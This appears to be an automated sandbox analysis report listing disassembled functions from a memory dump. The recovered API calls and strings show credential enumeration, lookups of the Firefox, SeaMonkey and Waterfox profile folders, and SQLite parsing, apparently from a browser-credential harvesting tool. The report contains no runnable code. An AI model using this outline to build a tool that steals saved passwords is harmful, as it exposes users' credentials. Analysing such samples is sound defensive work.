                                                                                                                                                                                    • Instruction ID: 5b72bd72183a146cc5fb8da473a5bce975bbff0c760a192580a28ed18ba85502
                                                                                                                                                                                    • Opcode Fuzzy Hash: b881829d82f0d8b9654aa99a04529af2f3c2152f6b010e5444e3d03ead400705
                                                                                                                                                                                    • Instruction Fuzzy Hash: 42218272A00244A6CF10BB6A9C8589E7B68EF44744B10457BB804B7293D67CDE85DB9D
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • memset.MSVCRT ref: 0040A824
                                                                                                                                                                                    • GetSystemDirectoryW.KERNEL32(C:\Windows\system32,00000104), ref: 0040A841
                                                                                                                                                                                    • wcscpy.MSVCRT ref: 0040A854
                                                                                                                                                                                    • wcscat.MSVCRT ref: 0040A86A
                                                                                                                                                                                    • LoadLibraryW.KERNELBASE(00000000), ref: 0040A87B
                                                                                                                                                                                    • LoadLibraryW.KERNEL32(?), ref: 0040A884
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000083.00000002.21827033751.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    • Associated: 00000083.00000002.21827033751.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000083.00000002.21827033751.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: LibraryLoad$DirectorySystemmemsetwcscatwcscpy
                                                                                                                                                                                    • String ID: C:\Windows\system32
                                                                                                                                                                                    • API String ID: 669240632-2896066436
                                                                                                                                                                                    • Opcode ID: 808217d469f29374b6c53add07773bde8ba425e7a3f83fd710eb9a2b8acfca27
                                                                                                                                                                                    • Instruction ID: 21688b76284891f368be2c5f4feed5723597baa153f24eadc702144372ba9d0b
                                                                                                                                                                                    • Opcode Fuzzy Hash: 808217d469f29374b6c53add07773bde8ba425e7a3f83fd710eb9a2b8acfca27
                                                                                                                                                                                    • Instruction Fuzzy Hash: A6F0A472D0022467DF207B65AC46B8A3B6CBF01754F008072F908B71D2EB789A55CFDA
                                                                                                                                                                                    APIs
                                                                                                                                                                                      • Part of subcall function 00404363: GetProcAddress.KERNEL32(?,00000000), ref: 00404398
                                                                                                                                                                                      • Part of subcall function 00404363: GetProcAddress.KERNEL32(?,00000000), ref: 004043AC
                                                                                                                                                                                      • Part of subcall function 00404363: GetProcAddress.KERNEL32(?,00000000), ref: 004043BF
                                                                                                                                                                                      • Part of subcall function 00404363: GetProcAddress.KERNEL32(?,00000000), ref: 004043D3
                                                                                                                                                                                      • Part of subcall function 00404363: GetProcAddress.KERNEL32(?,00000000), ref: 004043E7
                                                                                                                                                                                    • CredEnumerateW.ADVAPI32(00000000,00000000,?,?,?,00000000,?), ref: 0040BDE9
                                                                                                                                                                                    • wcslen.MSVCRT ref: 0040BE06
                                                                                                                                                                                    • wcsncmp.MSVCRT ref: 0040BE38
                                                                                                                                                                                    • memset.MSVCRT ref: 0040BE91
                                                                                                                                                                                    • memcpy.MSVCRT(?,?,?,00000001,?,?,?,00000000,?), ref: 0040BEB2
                                                                                                                                                                                    • _wcsnicmp.MSVCRT ref: 0040BEFC
                                                                                                                                                                                    • wcschr.MSVCRT ref: 0040BF24
                                                                                                                                                                                    • LocalFree.KERNEL32(?,?,?,?,00000001,?,?,?,00000000,?), ref: 0040BF48
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000083.00000002.21827033751.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    • Associated: 00000083.00000002.21827033751.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000083.00000002.21827033751.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: AddressProc$CredEnumerateFreeLocal_wcsnicmpmemcpymemsetwcschrwcslenwcsncmp
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 697348961-0
                                                                                                                                                                                    • Opcode ID: 33cbc3fbfef4114ffc04ab79ab4e472c1ca1484598d0cfc67a802b423a316e07
                                                                                                                                                                                    • Instruction ID: 79a9ca8399314c5bcb3e205da5602351372edcdcc58f79068602210d8f55f42f
                                                                                                                                                                                    • Opcode Fuzzy Hash: 33cbc3fbfef4114ffc04ab79ab4e472c1ca1484598d0cfc67a802b423a316e07
                                                                                                                                                                                    • Instruction Fuzzy Hash: 1851E9B5D002099FCF20DFA5C8859AEBBF9FF48304F10452AE919F7251E734A9458F69
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • memset.MSVCRT ref: 00403CBF
                                                                                                                                                                                    • memset.MSVCRT ref: 00403CD4
                                                                                                                                                                                    • memset.MSVCRT ref: 00403CE9
                                                                                                                                                                                    • memset.MSVCRT ref: 00403CFE
                                                                                                                                                                                    • memset.MSVCRT ref: 00403D13
                                                                                                                                                                                      • Part of subcall function 00414C2E: SHGetSpecialFolderPathW.SHELL32(00000000,?,0000001A,00000000,?,00000000), ref: 00414C68
                                                                                                                                                                                      • Part of subcall function 00414C2E: memset.MSVCRT ref: 00414C87
                                                                                                                                                                                      • Part of subcall function 00414C2E: RegCloseKey.ADVAPI32(00445DDE,?,?,?,?,?,00000000), ref: 00414CEE
                                                                                                                                                                                      • Part of subcall function 00414C2E: wcscpy.MSVCRT ref: 00414CFC
                                                                                                                                                                                      • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                                                                                                                                                                      • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                                                                                                                                                                      • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                                                                                                                                                                      • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                                                                                                                                                                      • Part of subcall function 0040414F: memset.MSVCRT ref: 00404172
                                                                                                                                                                                      • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 004041D6
                                                                                                                                                                                      • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 004041E7
                                                                                                                                                                                      • Part of subcall function 0040414F: memset.MSVCRT ref: 00404200
                                                                                                                                                                                      • Part of subcall function 0040414F: memset.MSVCRT ref: 00404215
                                                                                                                                                                                      • Part of subcall function 0040414F: _snwprintf.MSVCRT ref: 0040422F
                                                                                                                                                                                      • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 00404242
                                                                                                                                                                                    • memset.MSVCRT ref: 00403DDA
                                                                                                                                                                                      • Part of subcall function 004099C6: wcslen.MSVCRT ref: 004099CD
                                                                                                                                                                                      • Part of subcall function 004099C6: memcpy.MSVCRT(?,?,000000FF,?,004447C5,00000000,?,?,?,00000000,?), ref: 004099E3
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000083.00000002.21827033751.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    • Associated: 00000083.00000002.21827033751.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000083.00000002.21827033751.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: memset$wcscpy$wcslen$CloseFolderPathSpecial_snwprintfmemcpywcscat
                                                                                                                                                                                    • String ID: Waterfox$Waterfox\Profiles
                                                                                                                                                                                    • API String ID: 4039892925-11920434
                                                                                                                                                                                    • Opcode ID: 74213e66932f07ea3ad059af1798c87c438cc92db4e0e7cdb609a7dadd567ada
                                                                                                                                                                                    • Instruction ID: d72014143a293005b417e5222852f61d3cfc405123c5957a7e6d01a12b636873
                                                                                                                                                                                    • Opcode Fuzzy Hash: 74213e66932f07ea3ad059af1798c87c438cc92db4e0e7cdb609a7dadd567ada
                                                                                                                                                                                    • Instruction Fuzzy Hash: 1E4133B294012C7ADB20EB56DC85ECF777CEF85314F1180ABB509B2181DA745B948FAA
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • memset.MSVCRT ref: 00403E50
                                                                                                                                                                                    • memset.MSVCRT ref: 00403E65
                                                                                                                                                                                    • memset.MSVCRT ref: 00403E7A
                                                                                                                                                                                    • memset.MSVCRT ref: 00403E8F
                                                                                                                                                                                    • memset.MSVCRT ref: 00403EA4
                                                                                                                                                                                      • Part of subcall function 00414C2E: SHGetSpecialFolderPathW.SHELL32(00000000,?,0000001A,00000000,?,00000000), ref: 00414C68
                                                                                                                                                                                      • Part of subcall function 00414C2E: memset.MSVCRT ref: 00414C87
                                                                                                                                                                                      • Part of subcall function 00414C2E: RegCloseKey.ADVAPI32(00445DDE,?,?,?,?,?,00000000), ref: 00414CEE
                                                                                                                                                                                      • Part of subcall function 00414C2E: wcscpy.MSVCRT ref: 00414CFC
                                                                                                                                                                                      • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                                                                                                                                                                      • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                                                                                                                                                                      • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                                                                                                                                                                      • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                                                                                                                                                                      • Part of subcall function 0040414F: memset.MSVCRT ref: 00404172
                                                                                                                                                                                      • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 004041D6
  • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 004041E7
  • Part of subcall function 0040414F: memset.MSVCRT ref: 00404200
  • Part of subcall function 0040414F: memset.MSVCRT ref: 00404215
  • Part of subcall function 0040414F: _snwprintf.MSVCRT ref: 0040422F
  • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 00404242
• memset.MSVCRT ref: 00403F6B
  • Part of subcall function 004099C6: wcslen.MSVCRT ref: 004099CD
  • Part of subcall function 004099C6: memcpy.MSVCRT(?,?,000000FF,?,004447C5,00000000,?,?,?,00000000,?), ref: 004099E3
Strings
Memory Dump Source
• Source File: 00000083.00000002.21827033751.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000083.00000002.21827033751.0000000000459000.00000040.80000000.00040000.00000000.sdmp
• Associated: 00000083.00000002.21827033751.0000000000473000.00000040.80000000.00040000.00000000.sdmp
Similarity
• API ID: memset$wcscpy$wcslen$CloseFolderPathSpecial_snwprintfmemcpywcscat
• String ID: Mozilla\SeaMonkey$Mozilla\SeaMonkey\Profiles
• API String ID: 4039892925-2068335096
• Opcode ID: fb8d06a7ed3fa35f71d99b938417e45633d605fe1ac21657eef3450a4ac41d2d
• Instruction ID: badb9319ce56d3a3e0b5d4601891faab39f88fc9b3936f94b46873e2979bc7df
• Opcode Fuzzy Hash: fb8d06a7ed3fa35f71d99b938417e45633d605fe1ac21657eef3450a4ac41d2d
• Instruction Fuzzy Hash: F94133B294012CBADB20EB56DC85FCF777CAF85314F1180A7B509F2181DA785B848F6A
APIs
• memset.MSVCRT ref: 00403FE1
• memset.MSVCRT ref: 00403FF6
• memset.MSVCRT ref: 0040400B
• memset.MSVCRT ref: 00404020
• memset.MSVCRT ref: 00404035
  • Part of subcall function 00414C2E: SHGetSpecialFolderPathW.SHELL32(00000000,?,0000001A,00000000,?,00000000), ref: 00414C68
  • Part of subcall function 00414C2E: memset.MSVCRT ref: 00414C87
  • Part of subcall function 00414C2E: RegCloseKey.ADVAPI32(00445DDE,?,?,?,?,?,00000000), ref: 00414CEE
  • Part of subcall function 00414C2E: wcscpy.MSVCRT ref: 00414CFC
  • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
  • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
  • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
  • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
  • Part of subcall function 0040414F: memset.MSVCRT ref: 00404172
  • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 004041D6
  • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 004041E7
  • Part of subcall function 0040414F: memset.MSVCRT ref: 00404200
  • Part of subcall function 0040414F: memset.MSVCRT ref: 00404215
  • Part of subcall function 0040414F: _snwprintf.MSVCRT ref: 0040422F
  • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 00404242
• memset.MSVCRT ref: 004040FC
  • Part of subcall function 004099C6: wcslen.MSVCRT ref: 004099CD
  • Part of subcall function 004099C6: memcpy.MSVCRT(?,?,000000FF,?,004447C5,00000000,?,?,?,00000000,?), ref: 004099E3
Strings
Memory Dump Source
• Source File: 00000083.00000002.21827033751.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000083.00000002.21827033751.0000000000459000.00000040.80000000.00040000.00000000.sdmp
• Associated: 00000083.00000002.21827033751.0000000000473000.00000040.80000000.00040000.00000000.sdmp
Similarity
• API ID: memset$wcscpy$wcslen$CloseFolderPathSpecial_snwprintfmemcpywcscat
• String ID: Mozilla\Firefox$Mozilla\Firefox\Profiles
• API String ID: 4039892925-3369679110
• Opcode ID: a800c2c864e82bb525ebc7d4b700ce70e1897f56eef446e490fc18a40a012dd3
• Instruction ID: a33c26704871042caa7cb74448a1974e70df039046fe21947f04a6d8cbe9f93a
• Opcode Fuzzy Hash: a800c2c864e82bb525ebc7d4b700ce70e1897f56eef446e490fc18a40a012dd3
• Instruction Fuzzy Hash: 354134B294012CBADB20EB56DC85ECF777CAF85314F1180A7B509B3181EA745B948F6A
APIs
• memcpy.MSVCRT(00000048,00451D40,0000002C,000003FF,00445FAE,?,00000000,?,0040B879), ref: 004444E3
Strings
Memory Dump Source
• Source File: 00000083.00000002.21827033751.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000083.00000002.21827033751.0000000000459000.00000040.80000000.00040000.00000000.sdmp
• Associated: 00000083.00000002.21827033751.0000000000473000.00000040.80000000.00040000.00000000.sdmp
Similarity
• API ID: memcpy
• String ID: BINARY$NOCASE$RTRIM$main$no such vfs: %s$temp
• API String ID: 3510742995-2641926074
• Opcode ID: 821e0fdd347fba4e0959882d1eed221cd0f9849de050a87fd0c537b7ccc40074
• Instruction ID: 565814064bb2237b40e40c3ad6633df45ffc5137317807aec9a32ad89077b3bf
• Opcode Fuzzy Hash: 821e0fdd347fba4e0959882d1eed221cd0f9849de050a87fd0c537b7ccc40074
• Instruction Fuzzy Hash: BA7119B1600701BFE710AF16CC81B66B7A8BB85319F11452FF4189B742D7BDED908B99
APIs
  • Part of subcall function 0040B633: free.MSVCRT ref: 0040B63A
  • Part of subcall function 0044553B: memset.MSVCRT ref: 004455C2
  • Part of subcall function 0044553B: wcsrchr.MSVCRT ref: 004455DA
• memset.MSVCRT ref: 004033B7
• memcpy.MSVCRT(?,00000000,0000121C), ref: 004033D0
• wcscmp.MSVCRT ref: 004033FC
• _wcsicmp.MSVCRT ref: 00403439
Strings
Memory Dump Source
• Source File: 00000083.00000002.21827033751.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000083.00000002.21827033751.0000000000459000.00000040.80000000.00040000.00000000.sdmp
• Associated: 00000083.00000002.21827033751.0000000000473000.00000040.80000000.00040000.00000000.sdmp
Similarity
• API ID: memset$_wcsicmpfreememcpywcscmpwcsrchr
• String ID: $0.@
• API String ID: 2758756878-1896041820
• Opcode ID: 90c1bd1f00aab923b8f25d437f952d518439630af4329cefc1ee53129d619d56
• Instruction ID: ab192eb15c9642abc1a13bae453f9d52c7669558764b377fc560e22e349fc473
• Opcode Fuzzy Hash: 90c1bd1f00aab923b8f25d437f952d518439630af4329cefc1ee53129d619d56
• Instruction Fuzzy Hash: 6B414A71A0C3819BD770EF65C885A8BB7E8AF86314F004D2FE48C97681DB3899458B5B
APIs
  • Part of subcall function 0040A804: memset.MSVCRT ref: 0040A824
  • Part of subcall function 0040A804: GetSystemDirectoryW.KERNEL32(C:\Windows\system32,00000104), ref: 0040A841
  • Part of subcall function 0040A804: wcscpy.MSVCRT ref: 0040A854
  • Part of subcall function 0040A804: wcscat.MSVCRT ref: 0040A86A
  • Part of subcall function 0040A804: LoadLibraryW.KERNELBASE(00000000), ref: 0040A87B
  • Part of subcall function 0040A804: LoadLibraryW.KERNEL32(?), ref: 0040A884
• GetProcAddress.KERNEL32(00000000,00000000), ref: 004449E7
• GetProcAddress.KERNEL32(00000000,00000000), ref: 004449F8
• GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A09
• GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A1A
• GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A2B
• GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A3C
• GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A4D
Memory Dump Source
• Source File: 00000083.00000002.21827033751.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000083.00000002.21827033751.0000000000459000.00000040.80000000.00040000.00000000.sdmp
• Associated: 00000083.00000002.21827033751.0000000000473000.00000040.80000000.00040000.00000000.sdmp
Similarity
• API ID: AddressProc$LibraryLoad$DirectorySystemmemsetwcscatwcscpy
• String ID:
• API String ID: 2941347001-0
• Opcode ID: 42456554a4125e12c9760a290a1ae7f8766add3746ffa376f76814c589a7dd26
• Instruction ID: 45112ec7679d7541be2eaee67b01953ccf91f0241e5cd71b41190719d78dca83
• Opcode Fuzzy Hash: 42456554a4125e12c9760a290a1ae7f8766add3746ffa376f76814c589a7dd26
• Instruction Fuzzy Hash: 2E115871840700EDEA207F72DD0FF2B7AA5EF40B14F10882EF555594E1EBB6A8119E9C
APIs
• memset.MSVCRT ref: 00403C09
• memset.MSVCRT ref: 00403C1E
  • Part of subcall function 00414C2E: SHGetSpecialFolderPathW.SHELL32(00000000,?,0000001A,00000000,?,00000000), ref: 00414C68
  • Part of subcall function 00409719: wcslen.MSVCRT ref: 0040971A
  • Part of subcall function 00409719: wcscat.MSVCRT ref: 00409732
• wcscat.MSVCRT ref: 00403C47
  • Part of subcall function 00414C2E: memset.MSVCRT ref: 00414C87
  • Part of subcall function 00414C2E: RegCloseKey.ADVAPI32(00445DDE,?,?,?,?,?,00000000), ref: 00414CEE
  • Part of subcall function 00414C2E: wcscpy.MSVCRT ref: 00414CFC
• wcscat.MSVCRT ref: 00403C70
Strings
Memory Dump Source
• Source File: 00000083.00000002.21827033751.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000083.00000002.21827033751.0000000000459000.00000040.80000000.00040000.00000000.sdmp
• Associated: 00000083.00000002.21827033751.0000000000473000.00000040.80000000.00040000.00000000.sdmp
Similarity
• API ID: memsetwcscat$CloseFolderPathSpecialwcscpywcslen
• String ID: Mozilla\Firefox\Profiles$Mozilla\Profiles
• API String ID: 1534475566-1174173950
• Opcode ID: 8452d1ff202b3ecdc32f03c4689b339ff6508c8f38893fabe83067ed25a4ac21
• Instruction ID: 5219a381a5be6f9fff484f4b9c8ff18b49dc44b18064e24db21ac924a7a96902
• Opcode Fuzzy Hash: 8452d1ff202b3ecdc32f03c4689b339ff6508c8f38893fabe83067ed25a4ac21
• Instruction Fuzzy Hash: 4401A9B294032C76DB207B669C86ECF672C9F45358F01447FB504B7182D9785E844AA9
APIs
  • Part of subcall function 00414B81: GetProcAddress.KERNEL32(00000000,SHGetSpecialFolderPathW), ref: 00414BA4
• SHGetSpecialFolderPathW.SHELL32(00000000,?,0000001A,00000000,?,00000000), ref: 00414C68
• memset.MSVCRT ref: 00414C87
                                                                                                                                                                                    • RegCloseKey.ADVAPI32(00445DDE,?,?,?,?,?,00000000), ref: 00414CEE
                                                                                                                                                                                    • wcscpy.MSVCRT ref: 00414CFC
                                                                                                                                                                                      • Part of subcall function 00409CEA: GetVersionExW.KERNEL32(0045D340,0000001A,00414C4F,?,00000000), ref: 00409D04
                                                                                                                                                                                    Strings
                                                                                                                                                                                    • Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders, xrefs: 00414CA2, 00414CB2
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000083.00000002.21827033751.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000083.00000002.21827033751.0000000000459000.00000040.80000000.00040000.00000000.sdmp
• Associated: 00000083.00000002.21827033751.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: AddressCloseFolderPathProcSpecialVersionmemsetwcscpy
                                                                                                                                                                                    • String ID: Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders
                                                                                                                                                                                    • API String ID: 71295984-2036018995
                                                                                                                                                                                    • Opcode ID: f400cfab40eb781a7377af97b809c3f02e1ff83a00fe342fd0a4f0569afe9d8a
                                                                                                                                                                                    • Instruction ID: cfba8ba70a3d5c5eb0df7add68d4968905301debfffe1ddd107e81ced3c7690c
                                                                                                                                                                                    • Opcode Fuzzy Hash: f400cfab40eb781a7377af97b809c3f02e1ff83a00fe342fd0a4f0569afe9d8a
                                                                                                                                                                                    • Instruction Fuzzy Hash: EE110B31802224ABDB24A7999C4E9EF736CDBD1315F2200A7F80562151F6685EC5C6DE
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • wcschr.MSVCRT ref: 00414458
                                                                                                                                                                                    • _snwprintf.MSVCRT ref: 0041447D
                                                                                                                                                                                    • WritePrivateProfileStringW.KERNEL32(?,?,?,?), ref: 0041449B
                                                                                                                                                                                    • GetPrivateProfileStringW.KERNEL32(?,?,?,?,?,?), ref: 004144B3
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000083.00000002.21827033751.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000083.00000002.21827033751.0000000000459000.00000040.80000000.00040000.00000000.sdmp
• Associated: 00000083.00000002.21827033751.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: PrivateProfileString$Write_snwprintfwcschr
                                                                                                                                                                                    • String ID: "%s"
                                                                                                                                                                                    • API String ID: 1343145685-3297466227
                                                                                                                                                                                    • Opcode ID: aabbe202c5f79078aea71dac5ab2605718744c8b92afc7520f4e067a7367162e
                                                                                                                                                                                    • Instruction ID: 05c1b6e2b8d8aed92df8b5d38884bf02313f678dea9e3ece4dcd1a0b753c0483
                                                                                                                                                                                    • Opcode Fuzzy Hash: aabbe202c5f79078aea71dac5ab2605718744c8b92afc7520f4e067a7367162e
                                                                                                                                                                                    • Instruction Fuzzy Hash: 7201AD3240421ABBEF219F81DC09FDB3F6AFF09305F14806ABA08501A1D339C5A5EB58
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • GetModuleHandleW.KERNEL32(kernel32.dll,?,00413EA2,?,?,?,?,?,00000000,?), ref: 00413CB5
                                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,GetProcessTimes), ref: 00413CCF
                                                                                                                                                                                    • GetProcessTimes.KERNELBASE(00000000,?,?,?,?,?,00413EA2,?,?,?,?,?,00000000,?), ref: 00413CF2
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000083.00000002.21827033751.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000083.00000002.21827033751.0000000000459000.00000040.80000000.00040000.00000000.sdmp
• Associated: 00000083.00000002.21827033751.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: AddressHandleModuleProcProcessTimes
                                                                                                                                                                                    • String ID: GetProcessTimes$kernel32.dll
                                                                                                                                                                                    • API String ID: 1714573020-3385500049
                                                                                                                                                                                    • Opcode ID: 3d2a63fc8b7889f90c1cc675bbb66959c3424aca663c91e440c9d47c6094dacc
                                                                                                                                                                                    • Instruction ID: 0a9fc9a7fb2a98cd878f934f387e3824ef844cc6c25aa3dbb33b58617c33e237
                                                                                                                                                                                    • Opcode Fuzzy Hash: 3d2a63fc8b7889f90c1cc675bbb66959c3424aca663c91e440c9d47c6094dacc
                                                                                                                                                                                    • Instruction Fuzzy Hash: F5F03036204309AFEF008FA6FD06B963BA8BB04742F044066FA0CD1561D7B5D6B0EF99
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • memset.MSVCRT ref: 004087D6
                                                                                                                                                                                      • Part of subcall function 0040A6E6: WideCharToMultiByte.KERNEL32(0000FDE9,00000000,000003FF,000000FF,00000000,000003FF,00000000,00000000,0040B866,00445FAE,?,?,?,?,?,?), ref: 0040A6FF
                                                                                                                                                                                      • Part of subcall function 004095D9: memset.MSVCRT ref: 004095FC
                                                                                                                                                                                    • memset.MSVCRT ref: 00408828
                                                                                                                                                                                    • memset.MSVCRT ref: 00408840
                                                                                                                                                                                    • memset.MSVCRT ref: 00408858
                                                                                                                                                                                    • memset.MSVCRT ref: 00408870
                                                                                                                                                                                    • memset.MSVCRT ref: 00408888
                                                                                                                                                                                      • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                                                                                                                                                                      • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                                                                                                                                                                      • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                                                                                                                                                                      • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                                                                                                                                                                      • Part of subcall function 00409B98: GetFileAttributesW.KERNELBASE(?,0040DAEA,?,0040DBA1,00000000,?,00000000,00000208,?), ref: 00409B9C
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000083.00000002.21827033751.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000083.00000002.21827033751.0000000000459000.00000040.80000000.00040000.00000000.sdmp
• Associated: 00000083.00000002.21827033751.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: memset$wcslen$AttributesByteCharFileMultiWidewcscatwcscpy
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 2911713577-0
                                                                                                                                                                                    • Opcode ID: 6684bba834465d20886231ffe2d62564197a18c1a2325da43f028315e65dbcab
                                                                                                                                                                                    • Instruction ID: a7e5ca25de4111a2a05fe91eb9e7b9268c7acadad77a1a504b595fc773a76dc1
                                                                                                                                                                                    • Opcode Fuzzy Hash: 6684bba834465d20886231ffe2d62564197a18c1a2325da43f028315e65dbcab
                                                                                                                                                                                    • Instruction Fuzzy Hash: BD5146B280011D7EEB50E751DC46EEF776CDF05318F0040BEB948B6182EA745F948BA9
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • memcmp.MSVCRT(?,?,00000004,?,00000065,004381DF,00000065,00000000,00000007,?,00000000), ref: 0041F202
                                                                                                                                                                                    • memcmp.MSVCRT(?,SQLite format 3,00000010,?,00000065,004381DF,00000065,00000000), ref: 0041F22D
                                                                                                                                                                                    • memcmp.MSVCRT(?,@ ,00000003,?,?,00000065,004381DF,00000065,00000000), ref: 0041F299
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000083.00000002.21827033751.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000083.00000002.21827033751.0000000000459000.00000040.80000000.00040000.00000000.sdmp
• Associated: 00000083.00000002.21827033751.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: memcmp
                                                                                                                                                                                    • String ID: @ $SQLite format 3
                                                                                                                                                                                    • API String ID: 1475443563-3708268960
                                                                                                                                                                                    • Opcode ID: 82854fe69cd6f085c01fb16587ca6c24c159481fbb1fdb23c3f30c43337b22d0
                                                                                                                                                                                    • Instruction ID: a5e199d7c3355b23248e204991ed7883f9cb1cefd3641e4a8180bf992d12f390
                                                                                                                                                                                    • Opcode Fuzzy Hash: 82854fe69cd6f085c01fb16587ca6c24c159481fbb1fdb23c3f30c43337b22d0
                                                                                                                                                                                    • Instruction Fuzzy Hash: 9051C1719002199BDF10DFA9C4817DEB7F4AF44314F1541AAEC14EB246E778EA8ACB88
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000083.00000002.21827033751.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000083.00000002.21827033751.0000000000459000.00000040.80000000.00040000.00000000.sdmp
• Associated: 00000083.00000002.21827033751.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: _wcsicmpqsort
                                                                                                                                                                                    • String ID: /nosort$/sort
                                                                                                                                                                                    • API String ID: 1579243037-1578091866
                                                                                                                                                                                    • Opcode ID: a0f12cb90dd745c164ef67684cb79943b88980d13b6e843c418957b63f9314a7
                                                                                                                                                                                    • Instruction ID: 59a4a6edbc2c6816dd96362f3638b70d105e8990563e463c72bda517b6347aa4
                                                                                                                                                                                    • Opcode Fuzzy Hash: a0f12cb90dd745c164ef67684cb79943b88980d13b6e843c418957b63f9314a7
                                                                                                                                                                                    • Instruction Fuzzy Hash: C8213770700201AFD714FB36C880E96F3AAFF58314F11012EE61897692DB39BC918B4A
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • memset.MSVCRT ref: 0040E60F
                                                                                                                                                                                    • memset.MSVCRT ref: 0040E629
